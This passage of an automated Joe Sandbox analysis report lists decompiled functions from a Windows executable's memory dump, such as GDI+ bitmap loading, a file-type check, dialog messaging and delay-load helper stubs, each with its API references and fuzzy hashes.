				L0101E214();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E01019B0F(__eax, _a4, _a8); // executed
				return _t6;
			}

0x01019d7e
0x01019d7f
0x01019d81
0x01019d86
0x01019d8b
0x00000000
0x01019d9c
0x01019d95
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 01019D81

Part of subcall function 01019B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 01019B30

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 9d615a1baa09cb5b54bb39e455f9158759ee3e853d083bb8f0665778448d491f
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: A0D0C73065420D7ADF41BB75CC219BE7BA9EB10254F404165BD8886154ED75DA109661

Uniqueness

Uniqueness Score: -1.00%

Function 01009989, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01009989(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0100998d
0x01009995
0x0100999e
0x010099ab
0x010099a5
0x010099a7
0x010099a7
0x0100998f
0x01009991
0x01009991

APIs

GetFileType.KERNELBASE(000000FF,01009887), ref: 01009995

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 87ea5ca510a5fdb6b65b8820e87e698434ebf3fd39b6079f257e2380282cc149
Instruction ID: 63e40bbfe9c8a27cf323090cfe45af01dee4cf8cbbd1260ad4240e96c402b2b9
Opcode Fuzzy Hash: 87ea5ca510a5fdb6b65b8820e87e698434ebf3fd39b6079f257e2380282cc149
Instruction Fuzzy Hash: A3D01231111142A5AFB3463C49490997B91DB8327EF38C6E4E1A9C40E7D723C403F582

Uniqueness

Uniqueness Score: -1.00%

Function 0101D41A, Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101D41A(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0x1048458, 0x6a, 0x402, E0100FAEC(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E0101AC74(); // executed
				return _t7;
			}

0x0101d43f
0x0101d445
0x0101d44a

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0101D43F

Part of subcall function 0101AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101AC85
Part of subcall function 0101AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101AC96
Part of subcall function 0101AC74: IsDialogMessageW.USER32(000C0084,?), ref: 0101ACAA
Part of subcall function 0101AC74: TranslateMessage.USER32(?), ref: 0101ACB8
Part of subcall function 0101AC74: DispatchMessageW.USER32(?), ref: 0101ACC2

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 0d9ff42764cff55473b228faeee5b2013b1cb89f2a7cd3debbf537d5a85c8e2b
Instruction ID: a31becb78d76106c3a0e2c80e1c6a335c81c14516f6eaef4852cb5a4a6b33c62
Opcode Fuzzy Hash: 0d9ff42764cff55473b228faeee5b2013b1cb89f2a7cd3debbf537d5a85c8e2b
Instruction Fuzzy Hash: 09D09E75144301BBD6222B51CE06F0F7AA6AB98B04F004954B384750F5C6669D20AB15

Uniqueness

Uniqueness Score: -1.00%

Function 0101D906, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D906() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x106213c); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46661e8989a4d8a625cdbe28b8122aa8dfb9481366d2961f99f9b6f98058c95f
Instruction ID: 4002093766ea11753a2b2d8e373bfbf3c08be4f62d81800a0dd3ff88ff4bbf95
Opcode Fuzzy Hash: 46661e8989a4d8a625cdbe28b8122aa8dfb9481366d2961f99f9b6f98058c95f
Instruction Fuzzy Hash: D5B0129526D002AC300CB185BC1DD3A120DC7D2914320800EB8CDD80C4E4445C044632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D910, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D910() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062138); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f58a3cc7b2e8242ac122096710c2c37849d470feaac782354d3193c27e715c74
Instruction ID: 9652a7369451c77426e5f3cc462d614fdc7e189687c87c54d700b422e8cefaa3
Opcode Fuzzy Hash: f58a3cc7b2e8242ac122096710c2c37849d470feaac782354d3193c27e715c74
Instruction Fuzzy Hash: 16B012A526D102AD304CB285BC1DD3A120DC7D1914320410EB4CDD8084E4445C444632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D924, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D924() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062130); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b6626a0e16604068df3c9a67d63dcc7dcfbdb20c1b5c0554b9eff95ab356dd21
Instruction ID: 921326d0cd0a577fdd11bf023db9b9425109f3c423c9ef05dff02611d2630af9
Opcode Fuzzy Hash: b6626a0e16604068df3c9a67d63dcc7dcfbdb20c1b5c0554b9eff95ab356dd21
Instruction Fuzzy Hash: B9B0129527D002AC300CB185BC1DD3A124DDBD1914320400EB4CDD8084E4445C044632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D92E, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D92E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x106212c); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1dc0503b138ffd3288a5709285940666e6f0682166788d4107f295e83f20d895
Instruction ID: 9144c8324b41624ffc64756f3c4f3300b7a1ac0370b25feb82457043a02e7269
Opcode Fuzzy Hash: 1dc0503b138ffd3288a5709285940666e6f0682166788d4107f295e83f20d895
Instruction Fuzzy Hash: 57B0129526D002EC300C7195BC1DD3A124CC6D2914320800EB9CDD80C4E4449D444632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D942, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D942() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062124); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e427893882cfe54a7d33e555810de189316488c4a8fb8559b7a31b89dd0102a8
Instruction ID: 6d0db8aa8640d8f411b683a4119e1bb9df947f9d25877c0f800bb81169ec59e7
Opcode Fuzzy Hash: e427893882cfe54a7d33e555810de189316488c4a8fb8559b7a31b89dd0102a8
Instruction Fuzzy Hash: E3B012A526D002EC300C7185BD1DD3A128CC6D1914320400EB4CDD8084E4445E454632

Uniqueness

Uniqueness Score: -1.00%

Function 0101E1F9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101E1F9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bea4, 0x1062034); // executed
				goto __eax;
			}

0x0101e203
0x0101e20b
0x0101e212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E20B

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c4561094a29bcb52eabc3fea16430f592177833bc8b4d70235e1a86a3376598
Instruction ID: e6671842baa803d68f409099623e312e0510517c165c76b1a4c620ab9397ef04
Opcode Fuzzy Hash: 0c4561094a29bcb52eabc3fea16430f592177833bc8b4d70235e1a86a3376598
Instruction Fuzzy Hash: C2B012A226E0037C310C5145FD19C7F131CC6C0A50330800EF5C4D8044D4454D054032

Uniqueness

Uniqueness Score: -1.00%

Function 0101D891, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D891() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062168); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7e5811438c34bef2f9be2f2f905b4822582f03725a996e496e16107aad426bd
Instruction ID: 9b6ef1eb5f9b72c4672c9350e9758a5896a739169b44671eb92bd54d3f63f8d7
Opcode Fuzzy Hash: a7e5811438c34bef2f9be2f2f905b4822582f03725a996e496e16107aad426bd
Instruction Fuzzy Hash: 2EB0129926C302BD300C3181BC6DC3F120CC6D2914320451EB4CDE8084E4445C488532

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8AC, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8AC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062160); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 64d52b2f314bf0e4d122924d7e5e7de7c62ad06a57b7b549c65d24b5c7b2c4a5
Instruction ID: 75c5b751f3f2b1410d810407c6585e3041e135a9636f8d269fa416ebdc68ca5a
Opcode Fuzzy Hash: 64d52b2f314bf0e4d122924d7e5e7de7c62ad06a57b7b549c65d24b5c7b2c4a5
Instruction Fuzzy Hash: F0B0129926C102AC300C7185BC5DD3F120CE6D1914320400EB4CDD8084E4445C044732

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8B6, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8B6() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x106215c); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2661fbcd73459574b170bee255531efce31a80f2192ee95e1af6c7a2e4d1911a
Instruction ID: 09c10cfdf7d0d3e7d8a11ae75ba0325391734bc3c0d0e76844457eacabd6ba3e
Opcode Fuzzy Hash: 2661fbcd73459574b170bee255531efce31a80f2192ee95e1af6c7a2e4d1911a
Instruction Fuzzy Hash: 7CB012D526C002AC300C7185BC1DD3A120CC6D2914320C00EB8CDE81C4E4445C094632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8C0, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8C0() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062158); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: be5351c06ca66401af8a05128d28363e6a388763ef8568105f8ff1f0657fdb23
Instruction ID: 212c310fdee4035689cc5e5c60a0bebad9e5ecc98509a931a5484cbe6de50c31
Opcode Fuzzy Hash: be5351c06ca66401af8a05128d28363e6a388763ef8568105f8ff1f0657fdb23
Instruction Fuzzy Hash: FAB012D527C102AD304C7185BC1DD3A120CC6D1914320810EB4CDE8184E4445C894632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8CA, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8CA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062154); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
